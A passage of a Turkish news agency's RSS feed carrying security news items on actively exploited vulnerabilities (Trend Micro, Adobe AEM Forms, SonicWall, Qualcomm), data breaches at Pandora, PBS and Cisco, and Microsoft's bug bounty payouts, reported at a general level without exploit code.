<p style="margin: 0 0 14px 0;">Şirket, 2025’in ilk altı ayında kullanıcılarını hedef alan dolandırıcılık merkezleriyle bağlantılı 6,8 milyondan fazla hesabı devre dışı bıraktığını açıkladı. Yılın başında ise <strong>OpenAI</strong> ile iş birliği yaparak Kamboçya’da faaliyet gösteren bir dolandırıcılık merkezini kapattı. Bu merkez; kripto para yatırımı vaadi, sahte beğeni satışı ve kiralık scooter üzerinden yürütülen piramit şemaları gibi yöntemler kullanıyordu.</p>
<p style="margin: 0;">WhatsApp, Nisan ayında da özel sohbetlerde ve grup konuşmalarında paylaşılan hassas bilgileri korumak için <strong>Gelişmiş Sohbet Gizliliği</strong> (<em>Advanced Chat Privacy</em>) özelliğini devreye almıştı.</p>
<p style="margin: 14px 0 0 0; font-size: 14px; color: #6b7280;">Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Trend Micro, Apex One’da aktif olarak istismar edilen kritik güvenlik açığı için acil önlem çağrısı yaptı</title>
            <link>https://cumha.com.tr/trend-micro-apex-oneda-aktif-olarak-istismar-edilen-kritik-guvenlik-acigi-icin-acil-oenlem-cagrisi-yapti</link>
            <guid>https://cumha.com.tr/trend-micro-apex-oneda-aktif-olarak-istismar-edilen-kritik-guvenlik-acigi-icin-acil-oenlem-cagrisi-yapti</guid>
            <description><![CDATA[ Trend Micro, Apex One Management Console’daki komut enjeksiyonu zafiyetinin (CVE-2025-54948 ve CVE-2025-54987) aktif saldırılarda kullanıldığını duyurdu. Henüz yama yayımlanmadı, ancak geçici koruma sağlayan bir araç kullanıma sunuldu. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68967dcf24fd6.webp" length="44610" type="image/webp"/>
            
            <pubDate>Sat, 09 Aug 2025 01:29:32 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>CVE-2025-54948 ve CVE-2025-54987 güvenlik açıkları nasıl istismar ediliyor, Trend Micro hangi geçici çözümü sundu, yama ne zaman yayımlanacak, yönetim konsoluna erişim nasıl sınırlandırılmalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p style="margin: 0 0 14px 0;"><strong>Trend Micro</strong>, uç nokta güvenlik platformu <strong>Apex One</strong>’da tespit edilen ve aktif olarak istismar edilen kritik bir güvenlik açığı konusunda müşterilerini uyardı. <strong>CVE-2025-54948</strong> ve <strong>CVE-2025-54987</strong> olarak takip edilen zafiyet, <em>Apex One Management Console (on-premise)</em> bileşenindeki komut enjeksiyonu hatasından kaynaklanıyor.</p>
<p style="margin: 0 0 14px 0;">Bu açık, kimlik doğrulaması gerekmeksizin saldırganların sistemde uzaktan rastgele kod çalıştırmasına imkân veriyor. Şirket, güvenlik yamasının henüz hazır olmadığını, ancak istismarı engellemek için kısa vadeli koruma sağlayan bir geçici önlem aracının yayımlandığını açıkladı.</p>
<p style="margin: 0 0 14px 0;">Geçici çözüm, bilinen tüm istismar yöntemlerine karşı koruma sağlasa da, <em>Remote Install Agent</em> fonksiyonunu devre dışı bırakıyor. Bu nedenle yöneticiler, güvenlik yaması yayımlanana kadar uzak ajan kurulumlarını kullanamayacak.</p>
<p style="margin: 0 0 14px 0;">Trend Micro, güvenlik güncellemesinin 2025 Ağustos ortasında yayımlanacağını ve bu yamayla birlikte devre dışı bırakılan işlevin geri geleceğini belirtti. Şirket, özellikle yönetim konsolunun IP adresini internete açık tutan kullanıcıların, erişimi kısıtlayacak önlemleri derhal uygulamasını tavsiye etti.</p>
<p style="margin: 0 0 14px 0;"><strong>Japonya Ulusal Bilgisayar Acil Müdahale Ekibi (JPCERT)</strong> de güvenlik açığı için uyarı yayımlayarak kullanıcıları en kısa sürede geçici mitigasyonları uygulamaya çağırdı.</p>
<p style="margin: 0;">Trend Micro geçmişte de Apex One’daki sıfırıncı gün açıklarını kapatmış, Eylül 2022’de <strong>CVE-2022-40139</strong> ve Eylül 2023’te <strong>CVE-2023-41179</strong> güvenlik açıklarını yamalamıştı. Şirket, bu ayın başında ise Apex Central ve Endpoint Encryption (TMEE) PolicyServer ürünlerindeki kritik yetki atlatma ve uzaktan kod çalıştırma açıklarını gidermişti.</p>
<p style="margin: 14px 0 0 0; font-size: 14px; color: #6b7280;">Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Microsoft, son 12 ayda güvenlik araştırmacılarına rekor 17 milyon dolar ödedi</title>
            <link>https://cumha.com.tr/microsoft-son-12-ayda-guvenlik-arastirmacilarina-rekor-17-milyon-dolar-oededi</link>
            <guid>https://cumha.com.tr/microsoft-son-12-ayda-guvenlik-arastirmacilarina-rekor-17-milyon-dolar-oededi</guid>
            <description><![CDATA[ Microsoft, Temmuz 2024 – Haziran 2025 döneminde 59 ülkeden 344 güvenlik araştırmacısına toplam 17 milyon dolar bug bounty ödemesi yaptı. En yüksek bireysel ödül 200 bin dolara ulaşırken, bildirilen 1.469 güvenlik açığı raporu 1.000’den fazla potansiyel riski ortadan kaldırdı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68967df6b5d71.webp" length="65914" type="image/webp"/>
            
            <pubDate>Sat, 09 Aug 2025 01:29:30 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Microsoft bug bounty programı son 12 ayda hangi sonuçları elde etti, en yüksek ödül miktarı ne oldu, hangi ürünler program kapsamına alındı, 2025 Zero Day Quest yarışmasında ne kadar ödül verilecek</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p style="margin: 0 0 14px 0;"><strong>Microsoft</strong>, bug bounty programı kapsamında son 12 ayda rekor seviyede ödeme yaptığını açıkladı. Şirket, Temmuz 2024 ile Haziran 2025 arasında 59 ülkeden 344 güvenlik araştırmacısına toplam <strong>17 milyon dolar</strong> ödedi.</p>
<p style="margin: 0 0 14px 0;">Araştırmacılar bu dönemde <strong>1.469</strong> geçerli güvenlik açığı raporu sundu. En yüksek ödül <strong>200 bin dolar</strong> olurken, raporlar Azure, Microsoft 365, Dynamics 365, Power Platform, Windows, Edge ve Xbox gibi ürünlerde 1.000’den fazla potansiyel güvenlik açığının giderilmesine katkı sağladı.</p>
<p style="margin: 0 0 14px 0;">Microsoft, bağımsız araştırmacıların özellikle yapay zeka gibi hızla gelişen alanlarda yüksek etkili güvenlik açıklarını bulmasının, yeni tehditlerin önünde olunmasına yardımcı olduğunu belirtti. Şirket, <em>Koordine Edilmiş Güvenlik Açığı Bildirimi (Coordinated Vulnerability Disclosure)</em> sürecinin kullanıcı güvenini güçlendirdiğini vurguladı.</p>
<p style="margin: 0 0 14px 0;">Bu yıl Microsoft, Copilot AI, Defender ürünleri ve çeşitli kimlik yönetim sistemlerini kapsayan bounty programlarını genişletti. Copilot programına geleneksel çevrimiçi hizmet açıkları eklendi, Dynamics 365 ve Power Platform’a yeni bir yapay zeka kategorisi dahil edildi. Windows programına ise uzaktan hizmet reddi (DoS) ve yerel sandbox kaçış senaryoları ödülleri eklendi.</p>
<p style="margin: 0 0 14px 0;">Kimlik doğrulama programı artık daha fazla API ve alan adını kapsarken, Defender programı Microsoft Defender for Identity (MDI), Microsoft Defender for Office (MDO) ve Microsoft Defender for Cloud Applications (MDA) ürünlerini de içeriyor.</p>
<p style="margin: 0 0 14px 0;">Şirket, son dönemde orta seviye Microsoft Copilot güvenlik açıkları için ödülleri artırdı, bazı .NET ve ASP.NET Core açıkları için 40 bin dolara kadar ödeme yapacağını açıkladı. Ayrıca Power Platform ve Dynamics 365 AI açıkları için ödüller yükseltildi.</p>
<p style="margin: 0;">Microsoft, bu hafta başında <strong>2025 Zero Day Quest</strong> yarışmasında toplam <strong>5 milyon dolara</strong> kadar ödül dağıtacağını da duyurdu. Şirket, etkinliği “tarihin en büyük hacking organizasyonu” olarak tanımlıyor.</p>
<p style="margin: 14px 0 0 0; font-size: 14px; color: #6b7280;">Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Pandora, Salesforce tabanlı veri hırsızlığı saldırılarında müşteri bilgilerinin çalındığını doğruladı</title>
            <link>https://cumha.com.tr/pandora-salesforce-tabanli-veri-hirsizligi-saldirilarinda-musteri-bilgilerinin-calindigini-dogruladi</link>
            <guid>https://cumha.com.tr/pandora-salesforce-tabanli-veri-hirsizligi-saldirilarinda-musteri-bilgilerinin-calindigini-dogruladi</guid>
            <description><![CDATA[ Danimarkalı mücevher markası Pandora, Salesforce veritabanına yetkisiz erişim sonucu müşterilerinin isim, doğum tarihi ve e-posta adreslerinin çalındığını açıkladı. Şirket, erişimin durdurulduğunu ve güvenlik önlemlerinin güçlendirildiğini bildirdi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68967e29d9860.webp" length="51266" type="image/webp"/>
            
            <pubDate>Sat, 09 Aug 2025 01:29:29 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Pandora veri ihlalinde hangi müşteri bilgileri çalındı, Salesforce tabanlı saldırılar nasıl gerçekleştiriliyor, ShinyHunters grubu hangi tehditleri yöneltiyor, Salesforce şirketlere hangi güvenlik önerilerinde bulunuyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p style="margin: 0 0 14px 0;">Dünya genelinde 2.700 mağazası ve 37 binden fazla çalışanı bulunan Danimarkalı mücevher devi <strong>Pandora</strong>, müşteri bilgilerinin çalındığı bir veri ihlalini doğruladı. Şirketin müşterilerine gönderdiği bilgilendirme mektubunda, “İletişim bilgileriniz, kullandığımız üçüncü taraf bir platform üzerinden yetkisiz kişilerce erişildi. Erişimi durdurduk ve güvenlik önlemlerimizi güçlendirdik” ifadelerine yer verildi.</p>
<p style="margin: 0 0 14px 0;"><em>Forbes</em>’un haberine göre, saldırıda yalnızca müşteri isimleri, doğum tarihleri ve e-posta adresleri ele geçirildi. Parolalar, kimlik bilgileri veya finansal verilerin etkilenmediği açıklandı. <em>BleepingComputer</em>, verilerin Pandora’nın <strong>Salesforce</strong> veritabanından çalındığını öğrendi.</p>
<p style="margin: 0 0 14px 0;">En az Ocak 2025’ten beri devam eden saldırı dalgasında, tehdit aktörleri sosyal mühendislik ve kimlik avı yöntemleriyle çalışanların Salesforce giriş bilgilerini çalıyor veya kötü amaçlı OAuth uygulamalarına yetki verilmesini sağlıyor. Bu erişimle şirketlerin Salesforce veritabanları indirilip fidye talebiyle şantaj yapılıyor.</p>
<p style="margin: 0 0 14px 0;"><strong>ShinyHunters</strong> grubu, şirketleri özel olarak fidye talepleriyle tehdit ettiklerini ve ödeme yapılmaması halinde verilerin toplu satışını veya sızdırılmasını planladıklarını doğruladı. Grup, Snowflake veri hırsızlığı saldırılarında da benzer yöntemler kullanmıştı.</p>
<p style="margin: 0 0 14px 0;"><strong>Salesforce</strong> ise kendi platformunun saldırıya uğramadığını, olayların bilinen bir güvenlik açığından kaynaklanmadığını belirterek, tüm müşterilere çok faktörlü kimlik doğrulama (MFA) kullanmaları, en az ayrıcalık ilkesini uygulamaları ve bağlı uygulamaları dikkatle yönetmeleri yönünde uyarıda bulundu.</p>
<p style="margin: 0;">Benzer saldırılardan <strong>Adidas</strong>, <strong>Qantas</strong>, <strong>Allianz Life</strong> ve <strong>LVMH</strong> bünyesindeki <strong>Louis Vuitton</strong>, <strong>Dior</strong> ile <strong>Tiffany &amp; Co.</strong> markalarının da etkilendiği biliniyor. Ancak, henüz kamuoyuna açıklanmayan başka şirketlerin de saldırıya uğradığı belirtiliyor.</p>
<p style="margin: 14px 0 0 0; font-size: 14px; color: #6b7280;">Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>PBS, çalışan ve iş ortağı bilgilerini içeren veri ihlalini doğruladı</title>
            <link>https://cumha.com.tr/pbs-calisan-ve-is-ortagi-bilgilerini-iceren-veri-ihlalini-dogruladi</link>
            <guid>https://cumha.com.tr/pbs-calisan-ve-is-ortagi-bilgilerini-iceren-veri-ihlalini-dogruladi</guid>
            <description><![CDATA[ PBS, 3.997 çalışan ve iş ortağının kurumsal iletişim bilgilerinin MyPBS.org adlı dahili sistemden çalınarak Discord sunucularında paylaşıldığını açıkladı. Veriler genç kullanıcı topluluklarında dolaşsa da, kötüye kullanım riski bulunuyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68967e4ae4c55.webp" length="45696" type="image/webp"/>
            
            <pubDate>Sat, 09 Aug 2025 01:29:28 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>PBS veri ihlalinde hangi bilgiler sızdırıldı, dosya hangi platformlarda paylaşıldı, olayın amacı neden finansal kazanç değil, çalışan verileri hangi riskleri barındırıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p style="margin: 0 0 14px 0;">ABD merkezli kamu yayıncısı <strong>PBS</strong>, çalışan ve iş ortaklarına ait kurumsal iletişim bilgilerinin yer aldığı bir dosyanın çevrimiçi paylaşıldığını doğruladı. Olay, <strong>MyPBS.org</strong> adlı dahili sistemin hedef alınması sonucu gerçekleşti.</p>
<p style="margin: 0 0 14px 0;"><em>BleepingComputer</em>’ın edindiği bilgilere göre, sızan dosya karanlık ağ forumlarında değil, “PBS Kids” hayranlarının bulunduğu Discord topluluklarında paylaşıldı. Bu sunucularda genç yetişkinler, ergenler ve çocuklar favori televizyon programlarını konuşuyor. Kaynaklar, dosyanın bu gruplarda “merak, isyankâr heves veya arkadaş çevresinde dikkat çekme” amacıyla dolaştığını, ancak verilerin kötüye kullanılma ihtimalinin bulunduğunu aktardı.</p>
<p style="margin: 0 0 14px 0;">Paylaşılan JSON formatındaki dosya, <strong>3.997</strong> PBS çalışanı ve bağlı kuruluş personeline ait isim, kurumsal e-posta adresi, görev unvanı, zaman dilimi, departman, lokasyon, iş fonksiyonları, hobiler ve amir isimlerini içeriyor.</p>
<p style="margin: 0 0 14px 0;">PBS, olayın ardından etkilenen kullanıcılarla iletişime geçtiğini ve şu an için diğer sistemlerde bir güvenlik ihlali bulgusuna rastlanmadığını açıkladı. Şirketin açıklamasında, “MyPBS.org platformundan kullanıcı verilerinin yer aldığı dosyanın çevrimiçi olarak paylaşıldığı bilgisinin ardından kapsamlı bir soruşturma başlatıldı” denildi.</p>
<p style="margin: 0 0 14px 0;">Verilerin şu ana kadar kötü amaçla kullanıldığına dair bir bulgu olmasa da, dosyanın bu hafta sonu bile Discord topluluklarında dolaşmaya devam ettiği belirtiliyor. Özellikle PBS ve NPR üzerindeki siyasi baskılar göz önünde bulundurulduğunda, bu verilerin taciz veya <em>doxxing</em> amacıyla kullanılabileceği endişesi dile getiriliyor.</p>
<p style="margin: 14px 0 0 0; font-size: 14px; color: #6b7280;">Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Adobe, AEM Forms’ta kimlik doğrulamasız uzaktan kod çalıştırmaya izin veren iki sıfırıncı gün açığı için acil yama yayımladı</title>
            <link>https://cumha.com.tr/adobe-aem-formsta-kimlik-dogrulamasiz-uzaktan-kod-calistirmaya-izin-veren-iki-sifirinci-gun-acigi-icin-acil-yama-yayimladi</link>
            <guid>https://cumha.com.tr/adobe-aem-formsta-kimlik-dogrulamasiz-uzaktan-kod-calistirmaya-izin-veren-iki-sifirinci-gun-acigi-icin-acil-yama-yayimladi</guid>
            <description><![CDATA[ Adobe, Adobe Experience Manager (AEM) Forms on JEE ürününde tespit edilen ve PoC istismar zincirleri yayımlandıktan sonra aktif tehdit haline gelen iki kritik güvenlik açığını (CVE-2025-54253 ve CVE-2025-54254) kapattı. Açıklar, uzaktan kod çalıştırma ve dosya okuma imkânı tanıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68967e7b4bb64.webp" length="37130" type="image/webp"/>
            
            <pubDate>Sat, 09 Aug 2025 01:29:27 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>CVE-2025-54253 ve CVE-2025-54254 açıkları nasıl çalışıyor, PoC yayımlandıktan sonra hangi riskler ortaya çıktı, Adobe yamaları ne zaman ve nasıl yayımladı, güncelleme yapamayan yöneticiler için hangi önlemler önerildi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<div style="font-family: Arial, Helvetica, sans-serif; color: #1f2937; font-size: 16px; line-height: 1.7;">
<p style="margin: 0 0 14px 0;"><strong>Adobe</strong>, <strong>Adobe Experience Manager (AEM) Forms on JEE</strong> için iki kritik sıfırıncı gün güvenlik açığını kapatan acil güncellemeler yayımladı. <strong>CVE-2025-54253</strong> ve <strong>CVE-2025-54254</strong> olarak izlenen açıklar, kimlik doğrulaması gerekmeksizin uzaktan kod çalıştırma ve yerel dosya okuma saldırılarına olanak tanıyor.</p>
<p style="margin: 0 0 14px 0;"><strong>CVE-2025-54253</strong>, <code>/adminui</code> modülündeki kimlik doğrulama atlatma hatası ve yanlış yapılandırılmış geliştirici ayarından kaynaklanıyor. <em>Struts2</em>’nin geliştirme modunun açık bırakılması, saldırganların HTTP istekleriyle OGNL ifadeleri çalıştırmasına imkân veriyor. Bu açık, <strong>CVSS 8.6</strong> “kritik” olarak derecelendirildi.</p>
<p style="margin: 0 0 14px 0;"><strong>CVE-2025-54254</strong> ise SOAP tabanlı kimlik doğrulama hizmetinde yer alan XML External Entity (<em>XXE</em>) zafiyetinden kaynaklanıyor. Özel hazırlanmış XML istekleriyle saldırganlar, kimlik doğrulama olmadan sunucu üzerindeki yerel dosyaları (örneğin <code>win.ini</code>) okuyabiliyor. Bu açık <strong>CVSS 10.0</strong> ile “maksimum kritik” seviyede değerlendirildi.</p>
<p style="margin: 0 0 14px 0;">Söz konusu güvenlik sorunlarını <strong>Shubham Shah</strong> ve <strong>Adam Kues</strong> (Searchlight Cyber) 28 Nisan 2025’te Adobe’a bildirdi. Üçüncü bir açık olan <strong>CVE-2025-49533</strong> (Java deserialization yoluyla RCE) ise aynı güncelleme paketiyle giderildi. Araştırmacılar, 90 günlük bekleme süresi dolduktan sonra 29 Temmuz’da teknik ayrıntıları kamuya açıkladı.</p>
<p style="margin: 0;">Adobe, yöneticilere en kısa sürede en son güncellemeleri ve hotfix’leri yüklemelerini tavsiye etti. Güncelleme imkânı olmayan sistemlerde ise platform erişiminin internetten kısıtlanması önerildi.</p>
<p style="margin: 14px 0 0 0; font-size: 14px; color: #6b7280;">Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>
</div>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Cisco, vishing saldırısıyla elde edilen kullanıcı verilerini içeren veri ihlalini doğruladı</title>
            <link>https://cumha.com.tr/cisco-vishing-saldirisiyla-elde-edilen-kullanici-verilerini-iceren-veri-ihlalini-dogruladi</link>
            <guid>https://cumha.com.tr/cisco-vishing-saldirisiyla-elde-edilen-kullanici-verilerini-iceren-veri-ihlalini-dogruladi</guid>
            <description><![CDATA[ Cisco, 24 Temmuz’da tespit edilen olayda, bir çalışanının sesli kimlik avı saldırısıyla kandırılması sonucu üçüncü taraf bir bulut tabanlı CRM sistemine erişim sağlandığını ve Cisco.com kullanıcı hesaplarına ait temel profil bilgilerinin çalındığını açıkladı. Şirket, parola veya hassas müşteri verilerinin ele geçirilmediğini belirtti. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68967e9342cef.webp" length="38634" type="image/webp"/>
            
            <pubDate>Sat, 09 Aug 2025 01:29:26 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Cisco veri ihlalinde hangi kullanıcı bilgileri ele geçirildi, saldırı hangi sosyal mühendislik yöntemiyle gerçekleştirildi, olay ShinyHunters grubunun saldırı dalgasıyla bağlantılı mı, Cisco hangi güvenlik önlemlerini uygulamaya başladı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p style="margin: 0 0 14px 0;">Ağ ekipmanı üreticisi <strong>Cisco</strong>, Cisco.com kullanıcı hesaplarını etkileyen bir veri ihlali yaşandığını duyurdu. 24 Temmuz’da fark edilen olayda, saldırganın sesli kimlik avı (<em>vishing</em>) yöntemiyle bir şirket temsilcisini kandırarak üçüncü taraf bulut tabanlı bir <strong>Müşteri İlişkileri Yönetimi (CRM)</strong> sistemine erişim sağladığı tespit edildi.</p>
<p style="margin: 0 0 14px 0;">Elde edilen veriler arasında kullanıcıların adları, çalıştıkları kurum isimleri, adresleri, Cisco tarafından atanmış kullanıcı kimlikleri, e-posta adresleri, telefon numaraları ve hesap oluşturma tarihleri gibi meta veriler yer alıyor. Cisco, olayda kurumsal müşterilere ait gizli bilgiler, parolalar veya hassas verilerin ele geçirilmediğini, ürün ve hizmetlerin etkilenmediğini vurguladı.</p>
<p style="margin: 0 0 14px 0;">Şirket, saldırganın ilgili CRM sistemine erişiminin derhal sonlandırıldığını, veri koruma otoriteleriyle iletişime geçildiğini ve yasal gereklilikler doğrultusunda etkilenen kullanıcıların bilgilendirildiğini açıkladı. Cisco, benzer saldırıları önlemek için personeline vishing girişimlerini tanıma ve önleme konusunda ek eğitimler vereceğini duyurdu.</p>
<p style="margin: 0 0 14px 0;">Olayın, <strong>ShinyHunters</strong> grubu ile ilişkilendirilen ve son haftalarda Adidas, Qantas, Allianz Life, LVMH markaları ile Chanel gibi büyük şirketleri etkileyen Salesforce tabanlı veri hırsızlığı saldırıları dalgasının bir parçası olabileceği değerlendiriliyor. Cisco, verilerin Salesforce ortamından mı çalındığını veya kaç kullanıcının etkilendiğini ise doğrulamadı.</p>
<p style="margin: 0;">Geçmişte de benzer güvenlik sorunları yaşayan şirket, Ekim ayında DevHub portalını, IntelBroker adlı tehdit aktörünün sızdırdığı “gizli” veriler sonrası çevrimdışına almış, Kasım ayında ise bunun hatalı yapılandırılmış herkese açık bir portal nedeniyle gerçekleştiğini açıklamıştı.</p>
<p style="margin: 14px 0 0 0; font-size: 14px; color: #6b7280;">Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>SonicWall, olası sıfırıncı gün açığı istismarı nedeniyle SSLVPN hizmetinin devre dışı bırakılmasını önerdi</title>
            <link>https://cumha.com.tr/sonicwall-olasi-sifirinci-gun-acigi-istismari-nedeniyle-sslvpn-hizmetinin-devre-disi-birakilmasini-oenerdi</link>
            <guid>https://cumha.com.tr/sonicwall-olasi-sifirinci-gun-acigi-istismari-nedeniyle-sslvpn-hizmetinin-devre-disi-birakilmasini-oenerdi</guid>
            <description><![CDATA[ SonicWall, Gen 7 güvenlik duvarlarını hedef alan ve Akira fidye yazılımı ile ilişkilendirilen saldırılar sonrası, yöneticilere SSLVPN hizmetini kapatmaları veya yalnızca güvenilir IP adreslerine erişim izni vermeleri çağrısında bulundu. Güvenlik şirketleri, saldırıların çok faktörlü kimlik doğrulamayı atlayabilen olası bir sıfırıncı gün açığı üzerinden gerçekleştiğini bildiriyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68967eb03d48d.webp" length="42218" type="image/webp"/>
            
            <pubDate>Sat, 09 Aug 2025 01:29:24 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>SonicWall SSLVPN hizmeti hangi güvenlik riski nedeniyle devre dışı bırakılmalı, saldırılarda olası sıfırıncı gün açığı nasıl kullanılıyor, Huntress hangi ek uyarıları yaptı, SonicWall yöneticilere hangi koruma adımlarını önerdi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p style="margin: 0 0 14px 0;"><strong>SonicWall</strong>, son haftalarda artan siber saldırılar nedeniyle <strong>Gen 7</strong> güvenlik duvarlarında <strong>SSLVPN</strong> hizmetinin devre dışı bırakılmasını tavsiye etti. Şirketin açıklaması, <strong>Arctic Wolf Labs</strong>’in 15 Temmuz’dan bu yana <strong>Akira</strong> fidye yazılımı ile gerçekleştirilen ve olası bir SonicWall sıfırıncı gün açığı kullanılarak yapılan saldırıları raporlamasının ardından geldi.</p>
<p style="margin: 0 0 14px 0;">Arctic Wolf, saldırıların ilk erişim yönteminin henüz netleşmediğini, ancak kimlik bilgisi hırsızlığı, brute force, sözlük saldırıları ve kimlik bilgisi doldurma yöntemlerinin tüm vakalarda kesin olarak dışlanmadığını belirtti. Yine de sıfırıncı gün açığının varlığı “yüksek olasılıklı” olarak değerlendirildi.</p>
<p style="margin: 0 0 14px 0;"><strong>Huntress</strong> tarafından yapılan ayrı bir analizde, SonicWall VPN’lerde çok faktörlü kimlik doğrulamayı atlatabilen ve fidye yazılımı dağıtabilen bir açığın aktif olarak istismar edildiği bildirildi. Huntress, VPN hizmetinin tamamen devre dışı bırakılmasını veya IP allow-listing yöntemiyle erişimin kısıtlanmasını önerdi. Şirket, saldırganların ilk ihlalin ardından saatler içinde etki alanı denetleyicilerine yöneldiğini vurguladı.</p>
<p style="margin: 0 0 14px 0;">SonicWall, müşterilere şu önlemleri almalarını tavsiye etti:</p>
<ul style="margin: 0 0 14px 20px; padding: 0;">
<li>SSLVPN hizmetini mümkünse devre dışı bırakmak,</li>
<li>Erişimi yalnızca güvenilir IP adresleriyle sınırlandırmak,</li>
<li>Botnet Koruması ve Coğrafi IP Filtreleme gibi güvenlik servislerini etkinleştirmek,</li>
<li>Tüm uzak erişimlerde MFA kullanmak,</li>
<li>Kullanılmayan hesapları silmek.</li>
</ul>
<p style="margin: 0 0 14px 0;">Şirket, son 72 saatte SSLVPN açık olan Gen 7 güvenlik duvarlarını hedef alan vakalarda artış yaşandığını belirterek, olayların bilinen bir açıkla mı yoksa yeni bir güvenlik açığıyla mı bağlantılı olduğunun araştırıldığını duyurdu.</p>
<p style="margin: 0;">SonicWall, kısa süre önce <strong>SMA 100</strong> cihazları için uzaktan kod çalıştırmaya yol açabilecek kritik bir güvenlik açığını (<strong>CVE-2025-40599</strong>) da yamalama uyarısı yapmıştı.</p>
<p style="margin: 14px 0 0 0; font-size: 14px; color: #6b7280;">Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Android, hedefli saldırılarda kullanılan Qualcomm güvenlik açıklarını kapatan güncellemeleri yayımladı</title>
            <link>https://cumha.com.tr/android-hedefli-saldirilarda-kullanilan-qualcomm-guvenlik-aciklarini-kapatan-guncellemeleri-yayimladi</link>
            <guid>https://cumha.com.tr/android-hedefli-saldirilarda-kullanilan-qualcomm-guvenlik-aciklarini-kapatan-guncellemeleri-yayimladi</guid>
            <description><![CDATA[ Google, Ağustos 2025 Android güvenlik güncellemesiyle altı güvenlik açığını giderdi. Bunlar arasında, Qualcomm Adreno GPU sürücülerindeki ve Graphics framework bileşenindeki iki kritik açık yer alıyor. Bu açıkların sınırlı, hedefli saldırılarda istismar edildiği doğrulandı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68967edf6c289.webp" length="56312" type="image/webp"/>
            
            <pubDate>Sat, 09 Aug 2025 01:29:22 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Qualcomm açıkları Android cihazlarda hangi riskleri oluşturuyor, CVE-2025-21479 ve CVE-2025-27038 nasıl istismar ediliyor, güncellemeler hangi cihazlara ne zaman ulaşacak, CISA bu açıklar için hangi uyarıları yaptı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p style="margin: 0 0 14px 0;"><strong>Google</strong>, Ağustos 2025 Android güvenlik güncellemelerini yayımlayarak toplam altı güvenlik açığını kapattı. Güncellemede öne çıkan iki kritik açık, <strong>Qualcomm</strong> tarafından geliştirilen Adreno GPU sürücülerinde ve Graphics framework bileşeninde bulunuyor. <strong>CVE-2025-21479</strong> ve <strong>CVE-2025-27038</strong> olarak izlenen bu açıkların, <strong>Google Threat Analysis Group</strong>’un uyarısına göre, sınırlı sayıda hedefli saldırıda kullanıldığı tespit edildi.</p>
<p style="margin: 0 0 14px 0;"><strong>CVE-2025-21479</strong>, GPU micronode üzerinde yetkisiz komut çalıştırılması sonucu bellek bozulmasına yol açan bir yetkilendirme hatası olarak tanımlanıyor. <strong>CVE-2025-27038</strong> ise Chrome tarayıcısında grafik işleme sırasında ortaya çıkan <em>use-after-free</em> hatasıyla bellek bozulmasına neden oluyor.</p>
<p style="margin: 0 0 14px 0;">Qualcomm, bu açıklar için yamaları Mayıs ayında OEM üreticilerine sağlamış ve etkilenen cihazların en kısa sürede güncellenmesini tavsiye etmişti. <strong>ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA)</strong> da her iki açığı 3 Haziran’da “aktif olarak istismar edilen açıklar” listesine ekleyerek federal kurumlara 24 Haziran’a kadar sistemlerini koruma talimatı verdi.</p>
<p style="margin: 0 0 14px 0;">Bu ayki Android güvenlik güncellemesinde ayrıca, sistem bileşeninde ayrıcalığı olmayan saldırganların, diğer güvenlik açıklarıyla zincirlenerek kullanıcı etkileşimi olmadan uzaktan kod çalıştırmasına imkân tanıyan kritik bir hata da giderildi.</p>
<p style="margin: 0 0 14px 0;">Google, <strong>2025-08-01</strong> ve <strong>2025-08-05</strong> olmak üzere iki güvenlik yaması paketi sundu. İkinci paket, birincideki tüm düzeltmelerin yanı sıra kapalı kaynak üçüncü taraf bileşenleri ve çekirdek alt bileşenlerine yönelik yamaları da içeriyor. Google Pixel cihazları bu güncellemeleri anında alırken, diğer üreticiler test ve uyarlama sürecinden geçtiği için gecikmeli dağıtım yapabiliyor.</p>
